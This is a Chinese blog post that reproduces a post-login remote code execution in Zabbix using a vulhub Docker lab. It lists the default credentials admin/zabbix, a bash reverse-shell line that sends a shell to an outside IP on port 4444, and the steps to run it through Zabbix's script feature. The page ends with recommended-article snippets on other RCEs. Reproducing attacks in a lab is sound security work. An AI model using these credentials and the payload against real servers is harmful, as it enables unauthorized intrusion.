zabbix后台RCE

最新推荐文章于 2023-03-19 14:08:10 发布
最新推荐文章于 2023-03-19 14:08:10 发布
阅读量1.2k 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44508748/article/details/110096684
版权

vulhub有现成的zabbix环境

git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git
cd vulhub/zabbix/CVE-2016-10134/
docker-compose up -d

zabbix默认口令admin\zabbix

1.写脚本
http://1.1.1.1/zabbix/zabbix.php?action=script.edit&scriptid=4

bash -i>& /dev/tcp/10.0.128.48/4444 0>&1

在这里插入图片描述
2.执行脚本
http://x.x.x.x/zabbix/latest.php?ddreset=1,点击Host groups的select,全选,本地监听端口然后选择脚本执行
在这里插入图片描述
3.shell反弹

在这里插入图片描述

Min1996
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JD-FreeFuck 后台RCE漏洞
weixin_51387754的博客
11-05 8437
漏洞简介 RCE英文全称:remote command/code execute 分为远程命令执行ping和远程代码执行evel。 漏洞出现的原因:没有在输入口做输入处理。 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞。 漏洞复现 fofa语法
zabbix6.4.6
最新发布
08-30
Zabbix是一款开源的企业级监控解决方案,它能够监控各种网络参数以确保服务器、网络设备和应用程序的正常运行。在本文中,我们将深入探讨如何在CentOS 7系统上安装Zabbix 6.4.6,这是一个功能强大的版本,包含了丰富...
Zabbix 2.2 < 3.0.3 - RCE with API JSON-RPC
weixin_34380781的博客
08-18 359
漏洞来源:https://www.exploit-db.com/exploits/39937/***成本:高危害程度:低(此洞需要密码)利用条件: 需要高权限用户登录影响范围:2.2 < 3.0.3tips: 此洞需要你拿到高权限的账户密码,当你拿到账户密码之后,进入后台也可以执行命令,利用API JSON-RPC为第二种方案。 此exp并不是很完美,因为不会自动...
Zabbix RCE with API JSON-RPC
weixin_33754913的博客
07-29 200
测试脚本: #!/usr/bin/env python # -*- coding: utf-8 -*- # Software Link: http://www.zabbix.com/download.php # Version: 2.2 - 3.0.3 import requests import json import sys def verify(ur...
CVE-2021-40904——CheckMk后台RCE
热门推荐
LiBai'S BLOG
04-10 1万+
CVE-2021-40904 漏洞描述 CheckMk Raw Edition(版本 1.5.0 到 1.5.0p25)的 Web 管理控制台允许错误配置允许嵌入 php 代码的 Web 应用程序 Dokuwiki(默认安装)。结果,实现了远程代码执行。成功的利用需要使用有效凭据或具有管理员角色的用户劫持会话来访问 Web 管理界面。 影响版本 从 1.5.0 到 1.5.0p25 攻击类型 RCE 解决方案 升级到 1.6 或更高版本 时间线 2021-09-01 发现问题。 2021-09-06 第
zabbix的rc控制脚本
weixin_33842304的博客
06-25 74
zabbix在freebsd的rc启动控制脚本, 拷贝如下内容到/usr/local/etc/zabbix_ctl,并且修改权限为可执行: #!/bin/sh umask022 CAT=/bin/cat KILL=/bin/kill SU_USER=zabbix#zabbixscript ZABBIX_SERVER=/usr/local/s...
Zabbix6.0中文手册
04-13
Zabbix 6.0 中文手册 Zabbix 是一个企业级的监控解决方案,提供了强大的监控和自动化功能。以下是 Zabbix 6.0 中文手册的知识点总结: 1. 简介:Zabbix 是一个基于 Web 的网络监控系统,可以监控各种网络设备和...
zabbix监控山石防火墙
06-05
山石系列zabbix监控模板
zabbix监控的白皮书
05-22
Zabbix是一款广泛使用的开源网络监控解决方案,用于检测和管理IT基础设施的性能和状态。这份6.0版本的监控白皮书提供了全面的指导,详细介绍了Zabbix的功能和新特性,帮助用户更好地理解和利用该系统。 1. **简介**...
zabbix6.0.6 Linux agent
07-23
Zabbix 6.0.6 Linux Agent 深度解析》 Zabbix是一款开源的企业级监控解决方案,它能够监控各种网络参数以及服务器健康状态,为系统管理员提供强大的数据收集、报警、报告等功能。在Zabbix 6.0.6版本中,Linux ...
Zabbix SQL Injection/RCE – CVE-2013-5743
cnbird's blog
11-11 1271
from:https://www.corelan.be/index.php/2013/10/04/zabbix-sql-injectionrce-cve-2013-5743/ 0x00 背景 该漏洞于2013年9月11号提交,9月23号得到确认,10月2号发布补丁。 新出的0day,可以通过sql注入直接进入后台,并执行系统命令。 该漏洞已有metasploit利用模块,请使用Zabb
seacms v10.1后台多处RCE 分析
RestoreJustice的博客
03-19 387
因为插入代码要注释掉后面的语句并且闭合前面的(不会影响页面正常,隐蔽性好。seacms多处存在RCE,原因都是对传入的参数未经过滤直接写入文件中执行造成的。这是是将设置参数值写入data/admin/ip.php文件,完成设置。这里构造耀执行的代码时,需要注意闭合前面的语句和注释后面的引号。这里参数很多,有的为了避免XSS,还是有做html实体编码的。这里可以开启或关闭IP安全设置并可以指定ip,通过。并且直接传入的参数拼接写入文件,没有任何过滤。这里也是同样的原因,没有过滤就直接写入文件。
某微1day后台RCE审计漏洞
渗透测试研究中心
12-30 1058
某应用存在后台RCE,根据相关信息,我们在对后台审计过程,这里发现一处调用newInstance实例化溯源找到InterfaceRegisterCustomOperationCmd #excute访问路径为 /api/integration/workflowflow/getInterfaceRegisterCustomOperationgetInterfaceRegisterCustomOper...
【日常记录】Zabbix后台管理系统代码架构浅析
chengzhf的专栏
08-25 321
【谨以此文,告诉大家,不会写代码也能做开发】 近日接到这么个需求,给Zabbix添加个交互。该交互首先需要给主机添加个自定义的ID,然后再在主机监测中,跳转到第三方系统,中间媒介就是自定义的ID。 需求便是如此,要做的事情就是: 1、在数据库中找到主机对应的表,添加字段,这里我们称之为deviceId; 2、在页面上增加写入的地方,然后让它保存到数据库中。 以这个需求为例,我们来看下Zabbix后台管理系统的大致架构。然后看下我又一次踩的坑。 首先要明确,Zabbix是一个设备管理的开源系统,且
php-proxy3 漏洞,Zabbix Server Active Proxy Trappe RCE 漏洞详解(CVE-2017-2824)
weixin_39663970的博客
04-12 508
前言有点相似Zabbix是一种企业监控解决方案,旨在使组织能够监控其网络中各种系统的健康状况和状态,包括:网络服务,服务器和网络设备。前些日子Lilith Wyatt of Cisco ASIG 发现利用命令注入的形式可以在Zabbix Server上实现远程代码执行,影响的版本为Zabbix 2.4.7 – 2.4.8r1。在复现过程中发现利用条件比较苛刻,首先需要能访问到Zabbix Serv...
zabbix后续
GodDevin的博客
05-03 230
mysql监控 [root@server11 ~]# vim /etc/zabbix/zabbix_agentd.d/userparameter_mysql.conf [root@server11 ~]# mkdir /var/lib/zabbix ##建立文件目录(userparameter_mysql.conf指定 ) [root@server11 ~]# cd /var/...
zabbix-web监控
qq_42365664的博客
06-14 215
centos7.2在一台客户端安装apache 这里客户端ip为:10.0.0.63测试服务器为:10.0.0.5yum install httpd -y启动systemctl start httpd-servicecd /var/www/html使用curl命令获取cookies信息curl -X get -b cookies -c cookies http://10.0.0.5/zabbix/...
Zabbix监控系统全面指南
3. **Zabbix进程构成**:Zabbix由多个后台进程组成,如Zabbix Server、Zabbix Agent、Zabbix Proxy、Zabbix Web前端等,这些进程协同工作,实现对网络环境的全方位监控。 4. **安装**:教程详细介绍了Zabbix的硬件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值